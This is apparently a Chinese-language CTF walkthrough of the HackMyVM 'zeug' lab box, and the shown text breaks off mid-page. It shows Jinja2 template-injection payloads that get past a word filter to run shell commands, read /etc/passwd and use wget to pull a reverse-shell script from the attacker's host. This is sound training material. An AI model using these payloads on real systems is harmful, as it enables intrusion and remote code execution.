{"id":471,"date":"2024-03-28T18:27:37","date_gmt":"2024-03-28T10:27:37","guid":{"rendered":"http:\/\/162.14.82.114\/?p=471"},"modified":"2024-03-30T16:15:40","modified_gmt":"2024-03-30T08:15:40","slug":"hmv-_-zeug","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/471\/03\/28\/2024\/","title":{"rendered":"hmv[-_-]zeug"},"content":{"rendered":"<h1>zeug<\/h1>\n<blockquote>\n<p>\u5bfc\u5165\u9776\u573a\u65f6\uff0c\u5efa\u8bae\u4f7f\u7528\u4e3a\u6240\u6709\u7f51\u5361\u91cd\u65b0\u751f\u6210MAC\u5730\u5740\u3002<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826200.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826200.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328135716613\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV 10.0.2.13<\/code><\/pre>\n<pre><code class=\"language-bash\">PORT     STATE SERVICE VERSION\n21\/tcp   open  ftp     vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 0        0             109 Jan 06 23:14 README.txt\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:10.0.2.4\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n5000\/tcp open  upnp?\n| fingerprint-strings: \n|   GetRequest: \n|     HTTP\/1.1 200 OK\n|     Server: Werkzeug\/3.0.1 Python\/3.11.2\n|     Date: Thu, 28 Mar 2024 05:58:16 GMT\n|     Content-Type: text\/html; charset=utf-8\n|     Content-Length: 549\n|     Connection: close\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta charset=&quot;UTF-8&quot;&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n|     &lt;title&gt;Zeug&lt;\/title&gt;\n|     &lt;link rel=&quot;stylesheet&quot; type=&quot;text\/css&quot; href=&quot;\/static\/styles\/styles.css&quot;&gt;\n|     &lt;\/head&gt;\n|     &lt;body&gt;\n|     &lt;h1&gt;Zeug&lt;\/h1&gt;\n|     &lt;h3&gt;Rendering HTML templates&lt;\/h3&gt;\n|     &lt;form action=&quot;\/&quot; method=&quot;post&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n|     &lt;input type=&quot;file&quot; name=&quot;file&quot; accept=&quot;.html&quot; title=&quot;Select file&quot; required&gt;\n|     &lt;input type=&quot;submit&quot; value=&quot;Upload&quot;&gt;\n|     &lt;\/form&gt;\n|     &lt;\/body&gt;\n|     &lt;\/html&gt;\n|   HTTPOptions: \n|     HTTP\/1.1 200 OK\n|     Server: Werkzeug\/3.0.1 Python\/3.11.2\n|     Date: Thu, 28 Mar 2024 05:58:31 GMT\n|     Content-Type: text\/html; charset=utf-8\n|     Allow: OPTIONS, GET, POST, HEAD\n|     Content-Length: 0\n|     Connection: close\n|   RTSPRequest: \n|     &lt;!DOCTYPE HTML&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta charset=&quot;utf-8&quot;&gt;\n|     &lt;title&gt;Error response&lt;\/title&gt;\n|     &lt;\/head&gt;\n|     &lt;body&gt;\n|     &lt;h1&gt;Error response&lt;\/h1&gt;\n|     &lt;p&gt;Error code: 400&lt;\/p&gt;\n|     &lt;p&gt;Message: Bad request version (&#039;RTSP\/1.0&#039;).&lt;\/p&gt;\n|     &lt;p&gt;Error code explanation: 400 - Bad request syntax or unsupported method.&lt;\/p&gt;\n|     &lt;\/body&gt;\n|_    &lt;\/html&gt;\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port5000-TCP:V=7.94SVN%I=7%D=3\/28%Time=660506F8%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,2D3,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Werkzeug\/3\\.0\\.1\\\nSF:x20Python\/3\\.11\\.2\\r\\nDate:\\x20Thu,\\x2028\\x20Mar\\x202024\\x2005:58:16\\x2\nSF:0GMT\\r\\nContent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nContent-Length:\nSF:\\x20549\\r\\nConnection:\\x20close\\r\\n\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html\\x20lan\nSF:g=\\&quot;en\\&quot;&gt;\\n&lt;head&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20charset=\\&quot;UTF-8\\&quot;&gt;\\n\\x20\\x2\nSF:0\\x20\\x20&lt;meta\\x20name=\\&quot;viewport\\&quot;\\x20content=\\&quot;width=device-width,\\x2\nSF:0initial-scale=1\\.0\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;title&gt;Zeug&lt;\/title&gt;\\n\\x20\\x20\\x\nSF:20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20type=\\&quot;text\/css\\&quot;\\x20href=\\&quot;\/stati\nSF:c\/styles\/styles\\.css\\&quot;&gt;\\n&lt;\/head&gt;\\n&lt;body&gt;\\n\\x20\\x20\\x20\\x20&lt;h1&gt;Zeug&lt;\/h1&gt;\nSF:\\n\\x20\\x20\\x20\\x20&lt;h3&gt;Rendering\\x20HTML\\x20templates&lt;\/h3&gt;\\n\\n\\x20\\x20\\x\nSF:20\\x20&lt;form\\x20action=\\&quot;\/\\&quot;\\x20method=\\&quot;post\\&quot;\\x20enctype=\\&quot;multipart\/f\nSF:orm-data\\&quot;&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;input\\x20type=\\&quot;file\\&quot;\\x2\nSF:0name=\\&quot;file\\&quot;\\x20accept=\\&quot;\\.html\\&quot;\\x20title=\\&quot;Select\\x20file\\&quot;\\x20requ\nSF:ired&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;input\\x20type=\\&quot;submit\\&quot;\\x20val\nSF:ue=\\&quot;Upload\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;\/form&gt;\\n\\n\\x20\\x20\\x20\\x20\\n\\n\\x20\\x20\nSF:\\x20\\x20\\n&lt;\/body&gt;\\n&lt;\/html&gt;&quot;)%r(RTSPRequest,16C,&quot;&lt;!DOCTYPE\\x20HTML&gt;\\n&lt;ht\nSF:ml\\x20lang=\\&quot;en\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;head&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0\\x20&lt;meta\\x20charset=\\&quot;utf-8\\&quot;&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;titl\nSF:e&gt;Error\\x20response&lt;\/title&gt;\\n\\x20\\x20\\x20\\x20&lt;\/head&gt;\\n\\x20\\x20\\x20\\x20&lt;\nSF:body&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;h1&gt;Error\\x20response&lt;\/h1&gt;\\n\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;p&gt;Error\\x20code:\\x20400&lt;\/p&gt;\\n\\x20\\x20\\x20\\\nSF:x20\\x20\\x20\\x20\\x20&lt;p&gt;Message:\\x20Bad\\x20request\\x20version\\x20\\(&#039;RTSP\/\nSF:1\\.0&#039;\\)\\.&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;p&gt;Error\\x20code\\x20expl\nSF:anation:\\x20400\\x20-\\x20Bad\\x20request\\x20syntax\\x20or\\x20unsupported\\x\nSF:20method\\.&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20&lt;\/body&gt;\\n&lt;\/html&gt;\\n&quot;)%r(HTTPOptions,CD,&quot;\nSF:HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Werkzeug\/3\\.0\\.1\\x20Python\/3\\.11\\.\nSF:2\\r\\nDate:\\x20Thu,\\x2028\\x20Mar\\x202024\\x2005:58:31\\x20GMT\\r\\nContent-T\nSF:ype:\\x20text\/html;\\x20charset=utf-8\\r\\nAllow:\\x20OPTIONS,\\x20GET,\\x20PO\nSF:ST,\\x20HEAD\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n&quot;);\nService Info: OS: Unix<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826204.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826204.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328140322970\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u5c1d\u8bd5\u8fde\u63a5ftp<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ ftp 10.0.2.13\nConnected to 10.0.2.13.\n220 (vsFTPd 3.0.3)\nName (10.0.2.13:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls\n229 Entering Extended Passive Mode (|||52547|)\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0             109 Jan 06 23:14 README.txt\n226 Directory send OK.\nftp&gt; get README.txt\nlocal: README.txt remote: README.txt\n229 Entering Extended Passive Mode (|||48843|)\n150 Opening BINARY mode data connection for README.txt (109 bytes).\n100% |**************************************************************************|   109        2.72 KiB\/s    00:00 ETA\n226 Transfer complete.\n109 bytes received in 00:00 (2.67 KiB\/s)<\/code><\/pre>\n<p><code>README.txt<\/code>\u5185\u5bb9\u4e3a\uff1a<\/p>\n<pre><code class=\"language-text\">Hi, Cosette, don&#039;t forget to disable the debug mode in the web application, we don&#039;t want security breaches.<\/code><\/pre>\n<h3>\u67e5\u770b\u9875\u9762<\/h3>\n<pre><code class=\"language-html\">&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;title&gt;Zeug&lt;\/title&gt;\n    &lt;link rel=&quot;stylesheet&quot; type=&quot;text\/css&quot; href=&quot;\/static\/styles\/styles.css&quot;&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;h1&gt;Zeug&lt;\/h1&gt;\n    &lt;h3&gt;Rendering HTML templates&lt;\/h3&gt;\n    &lt;form action=&quot;\/&quot; method=&quot;post&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n        &lt;input type=&quot;file&quot; name=&quot;file&quot; accept=&quot;.html&quot; title=&quot;Select file&quot; required&gt;\n        &lt;input type=&quot;submit&quot; value=&quot;Upload&quot;&gt;\n    &lt;\/form&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<h3>SSTI \u6a21\u677f\u6ce8\u5165<\/h3>\n<p>\u5c1d\u8bd5\u6a21\u677f\u6ce8\u5165\uff0c\u4f20\u4e00\u4e2a\u7b80\u5355\u7684html\u4e0a\u53bb\uff1a<\/p>\n<pre><code class=\"language-html\">&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n    &lt;head&gt;\n        HelloWorld!\n    &lt;\/head&gt;\n    &lt;body&gt;\n        {{9*9}}\n    &lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826205.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826205.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328141531197\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u771f\u7684\u5b58\u5728\u6a21\u677f\u6ce8\u5165\u4e86\uff01<\/p>\n<blockquote>\n<p><a href=\"https:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Server%20Side%20Template%20Injection\/#jinja2-debug-statement\">https:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Server%20Side%20Template%20Injection\/#jinja2-debug-statement<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-python\">{{os.system(&#039;whoami&#039;)}}<\/code><\/pre>\n<pre><code class=\"language-text\">Error: File: \/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py - Template contains restricted words: os<\/code><\/pre>\n<pre><code class=\"language-python\">{{ [].class.base.subclasses() }}<\/code><\/pre>\n<pre><code class=\"language-text\">Error: File: \/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py - Template contains restricted words: subclasses, [, ]<\/code><\/pre>\n<pre><code class=\"language-python\">{{ self.__init__.__globals__.__builtins__ }}<\/code><\/pre>\n<pre><code class=\"language-text\">Error: File: \/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py - Template contains restricted words: init<\/code><\/pre>\n<pre><code class=\"language-python\">{{ get_flashed_messages.__globals__.__builtins__.open(&quot;\/etc\/passwd&quot;).read() }}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826206.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826206.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328153310165\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e24\u4e2a\u7528\u6237<code>cosette<\/code>\u548c<code>exia<\/code>.<\/p>\n<h3>\u65b9\u6cd5\u4e00\uff1a\u6a21\u677f\u6ce8\u5165<\/h3>\n<p>\u5148\u67e5\u770b\u4e00\u4e0b\u5185\u7f6e\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-python\">{{lipsum.__globals__.__builtins__}}<\/code><\/pre>\n<pre><code class=\"language-text\">&lt;html&gt; &lt;head&gt; HelloWorld! &lt;\/head&gt; &lt;body&gt; {&#039;__name__&#039;: &#039;builtins&#039;, &#039;__doc__&#039;: &quot;Built-in functions, exceptions, and other objects.\\n\\nNoteworthy: None is the `nil&#039; object; Ellipsis represents `...&#039; in slices.&quot;, &#039;__package__&#039;: &#039;&#039;, &#039;__loader__&#039;: &lt;class &#039;_frozen_importlib.BuiltinImporter&#039;&gt;, &#039;__spec__&#039;: ModuleSpec(name=&#039;builtins&#039;, loader=&lt;class &#039;_frozen_importlib.BuiltinImporter&#039;&gt;, origin=&#039;built-in&#039;), &#039;__build_class__&#039;: &lt;built-in function __build_class__&gt;, &#039;__import__&#039;: &lt;built-in function __import__&gt;, &#039;abs&#039;: &lt;built-in function abs&gt;, &#039;all&#039;: &lt;built-in function all&gt;, &#039;any&#039;: &lt;built-in function any&gt;, &#039;ascii&#039;: &lt;built-in function ascii&gt;, &#039;bin&#039;: &lt;built-in function bin&gt;, &#039;breakpoint&#039;: &lt;built-in function breakpoint&gt;, &#039;callable&#039;: &lt;built-in function callable&gt;, &#039;chr&#039;: &lt;built-in function chr&gt;, &#039;compile&#039;: &lt;built-in function compile&gt;, &#039;delattr&#039;: &lt;built-in function delattr&gt;, &#039;dir&#039;: &lt;built-in function dir&gt;, &#039;divmod&#039;: &lt;built-in function divmod&gt;, &#039;eval&#039;: &lt;built-in function eval&gt;, &#039;exec&#039;: &lt;built-in function exec&gt;, &#039;format&#039;: &lt;built-in function format&gt;, &#039;getattr&#039;: &lt;built-in function getattr&gt;, &#039;globals&#039;: &lt;built-in function globals&gt;, &#039;hasattr&#039;: &lt;built-in function hasattr&gt;, &#039;hash&#039;: &lt;built-in function hash&gt;, &#039;hex&#039;: &lt;built-in function hex&gt;, &#039;id&#039;: &lt;built-in function id&gt;, &#039;input&#039;: &lt;built-in function input&gt;, &#039;isinstance&#039;: &lt;built-in function isinstance&gt;, &#039;issubclass&#039;: &lt;built-in function issubclass&gt;, &#039;iter&#039;: &lt;built-in function iter&gt;, &#039;aiter&#039;: &lt;built-in function aiter&gt;, &#039;len&#039;: &lt;built-in function len&gt;, &#039;locals&#039;: &lt;built-in function locals&gt;, &#039;max&#039;: &lt;built-in function max&gt;, &#039;min&#039;: &lt;built-in function min&gt;, &#039;next&#039;: &lt;built-in function next&gt;, &#039;anext&#039;: &lt;built-in function anext&gt;, &#039;oct&#039;: &lt;built-in function oct&gt;, &#039;ord&#039;: &lt;built-in function ord&gt;, &#039;pow&#039;: &lt;built-in function pow&gt;, &#039;print&#039;: &lt;built-in function print&gt;, &#039;repr&#039;: &lt;built-in function repr&gt;, &#039;round&#039;: &lt;built-in function round&gt;, &#039;setattr&#039;: &lt;built-in function setattr&gt;, &#039;sorted&#039;: &lt;built-in function sorted&gt;, &#039;sum&#039;: &lt;built-in function sum&gt;, &#039;vars&#039;: &lt;built-in function vars&gt;, &#039;None&#039;: None, &#039;Ellipsis&#039;: Ellipsis, &#039;NotImplemented&#039;: NotImplemented, &#039;False&#039;: False, &#039;True&#039;: True, &#039;bool&#039;: &lt;class &#039;bool&#039;&gt;, &#039;memoryview&#039;: &lt;class &#039;memoryview&#039;&gt;, &#039;bytearray&#039;: &lt;class &#039;bytearray&#039;&gt;, &#039;bytes&#039;: &lt;class &#039;bytes&#039;&gt;, &#039;classmethod&#039;: &lt;class &#039;classmethod&#039;&gt;, &#039;complex&#039;: &lt;class &#039;complex&#039;&gt;, &#039;dict&#039;: &lt;class &#039;dict&#039;&gt;, &#039;enumerate&#039;: &lt;class &#039;enumerate&#039;&gt;, &#039;filter&#039;: &lt;class &#039;filter&#039;&gt;, &#039;float&#039;: &lt;class &#039;float&#039;&gt;, &#039;frozenset&#039;: &lt;class &#039;frozenset&#039;&gt;, &#039;property&#039;: &lt;class &#039;property&#039;&gt;, &#039;int&#039;: &lt;class &#039;int&#039;&gt;, &#039;list&#039;: &lt;class &#039;list&#039;&gt;, &#039;map&#039;: &lt;class &#039;map&#039;&gt;, &#039;object&#039;: &lt;class &#039;object&#039;&gt;, &#039;range&#039;: &lt;class &#039;range&#039;&gt;, &#039;reversed&#039;: &lt;class &#039;reversed&#039;&gt;, &#039;set&#039;: &lt;class &#039;set&#039;&gt;, &#039;slice&#039;: &lt;class &#039;slice&#039;&gt;, &#039;staticmethod&#039;: &lt;class &#039;staticmethod&#039;&gt;, &#039;str&#039;: &lt;class &#039;str&#039;&gt;, &#039;super&#039;: &lt;class &#039;super&#039;&gt;, &#039;tuple&#039;: &lt;class &#039;tuple&#039;&gt;, &#039;type&#039;: &lt;class &#039;type&#039;&gt;, &#039;zip&#039;: &lt;class &#039;zip&#039;&gt;, &#039;__debug__&#039;: True, &#039;BaseException&#039;: &lt;class &#039;BaseException&#039;&gt;, &#039;BaseExceptionGroup&#039;: &lt;class &#039;BaseExceptionGroup&#039;&gt;, &#039;Exception&#039;: &lt;class &#039;Exception&#039;&gt;, &#039;GeneratorExit&#039;: &lt;class &#039;GeneratorExit&#039;&gt;, &#039;KeyboardInterrupt&#039;: &lt;class &#039;KeyboardInterrupt&#039;&gt;, &#039;SystemExit&#039;: &lt;class &#039;SystemExit&#039;&gt;, &#039;ArithmeticError&#039;: &lt;class &#039;ArithmeticError&#039;&gt;, &#039;AssertionError&#039;: &lt;class &#039;AssertionError&#039;&gt;, &#039;AttributeError&#039;: &lt;class &#039;AttributeError&#039;&gt;, &#039;BufferError&#039;: &lt;class &#039;BufferError&#039;&gt;, &#039;EOFError&#039;: &lt;class &#039;EOFError&#039;&gt;, &#039;ImportError&#039;: &lt;class &#039;ImportError&#039;&gt;, &#039;LookupError&#039;: &lt;class &#039;LookupError&#039;&gt;, &#039;MemoryError&#039;: &lt;class &#039;MemoryError&#039;&gt;, &#039;NameError&#039;: &lt;class &#039;NameError&#039;&gt;, &#039;OSError&#039;: &lt;class &#039;OSError&#039;&gt;, &#039;ReferenceError&#039;: &lt;class &#039;ReferenceError&#039;&gt;, &#039;RuntimeError&#039;: &lt;class &#039;RuntimeError&#039;&gt;, &#039;StopAsyncIteration&#039;: &lt;class &#039;StopAsyncIteration&#039;&gt;, &#039;StopIteration&#039;: &lt;class &#039;StopIteration&#039;&gt;, &#039;SyntaxError&#039;: &lt;class &#039;SyntaxError&#039;&gt;, &#039;SystemError&#039;: &lt;class &#039;SystemError&#039;&gt;, &#039;TypeError&#039;: &lt;class &#039;TypeError&#039;&gt;, &#039;ValueError&#039;: &lt;class &#039;ValueError&#039;&gt;, &#039;Warning&#039;: &lt;class &#039;Warning&#039;&gt;, &#039;FloatingPointError&#039;: &lt;class &#039;FloatingPointError&#039;&gt;, &#039;OverflowError&#039;: &lt;class &#039;OverflowError&#039;&gt;, &#039;ZeroDivisionError&#039;: &lt;class &#039;ZeroDivisionError&#039;&gt;, &#039;BytesWarning&#039;: &lt;class &#039;BytesWarning&#039;&gt;, &#039;DeprecationWarning&#039;: &lt;class &#039;DeprecationWarning&#039;&gt;, &#039;EncodingWarning&#039;: &lt;class &#039;EncodingWarning&#039;&gt;, &#039;FutureWarning&#039;: &lt;class &#039;FutureWarning&#039;&gt;, &#039;ImportWarning&#039;: &lt;class &#039;ImportWarning&#039;&gt;, &#039;PendingDeprecationWarning&#039;: &lt;class &#039;PendingDeprecationWarning&#039;&gt;, &#039;ResourceWarning&#039;: &lt;class &#039;ResourceWarning&#039;&gt;, &#039;RuntimeWarning&#039;: &lt;class &#039;RuntimeWarning&#039;&gt;, &#039;SyntaxWarning&#039;: &lt;class &#039;SyntaxWarning&#039;&gt;, &#039;UnicodeWarning&#039;: &lt;class &#039;UnicodeWarning&#039;&gt;, &#039;UserWarning&#039;: &lt;class &#039;UserWarning&#039;&gt;, &#039;BlockingIOError&#039;: &lt;class &#039;BlockingIOError&#039;&gt;, &#039;ChildProcessError&#039;: &lt;class &#039;ChildProcessError&#039;&gt;, &#039;ConnectionError&#039;: &lt;class &#039;ConnectionError&#039;&gt;, &#039;FileExistsError&#039;: &lt;class &#039;FileExistsError&#039;&gt;, &#039;FileNotFoundError&#039;: &lt;class &#039;FileNotFoundError&#039;&gt;, &#039;InterruptedError&#039;: &lt;class &#039;InterruptedError&#039;&gt;, &#039;IsADirectoryError&#039;: &lt;class &#039;IsADirectoryError&#039;&gt;, &#039;NotADirectoryError&#039;: &lt;class &#039;NotADirectoryError&#039;&gt;, &#039;PermissionError&#039;: &lt;class &#039;PermissionError&#039;&gt;, &#039;ProcessLookupError&#039;: &lt;class &#039;ProcessLookupError&#039;&gt;, &#039;TimeoutError&#039;: &lt;class &#039;TimeoutError&#039;&gt;, &#039;IndentationError&#039;: &lt;class &#039;IndentationError&#039;&gt;, &#039;IndexError&#039;: &lt;class &#039;IndexError&#039;&gt;, &#039;KeyError&#039;: &lt;class &#039;KeyError&#039;&gt;, &#039;ModuleNotFoundError&#039;: &lt;class &#039;ModuleNotFoundError&#039;&gt;, &#039;NotImplementedError&#039;: &lt;class &#039;NotImplementedError&#039;&gt;, &#039;RecursionError&#039;: &lt;class &#039;RecursionError&#039;&gt;, &#039;UnboundLocalError&#039;: &lt;class &#039;UnboundLocalError&#039;&gt;, &#039;UnicodeError&#039;: &lt;class &#039;UnicodeError&#039;&gt;, &#039;BrokenPipeError&#039;: &lt;class &#039;BrokenPipeError&#039;&gt;, &#039;ConnectionAbortedError&#039;: &lt;class &#039;ConnectionAbortedError&#039;&gt;, &#039;ConnectionRefusedError&#039;: &lt;class &#039;ConnectionRefusedError&#039;&gt;, &#039;ConnectionResetError&#039;: &lt;class &#039;ConnectionResetError&#039;&gt;, &#039;TabError&#039;: &lt;class &#039;TabError&#039;&gt;, &#039;UnicodeDecodeError&#039;: &lt;class &#039;UnicodeDecodeError&#039;&gt;, &#039;UnicodeEncodeError&#039;: &lt;class &#039;UnicodeEncodeError&#039;&gt;, &#039;UnicodeTranslateError&#039;: &lt;class &#039;UnicodeTranslateError&#039;&gt;, &#039;ExceptionGroup&#039;: &lt;class &#039;ExceptionGroup&#039;&gt;, &#039;EnvironmentError&#039;: &lt;class &#039;OSError&#039;&gt;, &#039;IOError&#039;: &lt;class &#039;OSError&#039;&gt;, &#039;open&#039;: &lt;built-in function open&gt;, &#039;quit&#039;: Use quit() or Ctrl-D (i.e. EOF) to exit, &#039;exit&#039;: Use exit() or Ctrl-D (i.e. EOF) to exit, &#039;copyright&#039;: Copyright (c) 2001-2023 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., &#039;credits&#039;: Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., &#039;license&#039;: Type license() to see the full license text, &#039;help&#039;: Type help() for interactive help, or help(object) for help about object.} &lt;\/body&gt; &lt;\/html&gt;<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u7528\u6237\u540d\uff1a<\/p>\n<pre><code class=\"language-python\">{{lipsum.__globals__.__builtins__.eval(&quot;__im&quot;&quot;port__(&#039;o&#039;&#039;s&#039;).pop&quot;&quot;en(&#039;whoami&#039;).read()&quot;)}}<\/code><\/pre>\n<pre><code class=\"language-text\">&lt;html&gt; &lt;head&gt; HelloWorld! &lt;\/head&gt; &lt;body&gt; cosette &lt;\/body&gt; &lt;\/html&gt;<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e2a\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-python\">{{lipsum.__globals__.__builtins__.eval(&quot;__im&quot;&quot;port__(&#039;o&#039;&#039;s&#039;).pop&quot;&quot;en(&#039;wget http:\/\/10.0.2.4:8888\/rev.sh&#039;).read()&quot;)}}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826207.png'><img class=\"lazyload lazyload-style-2\" 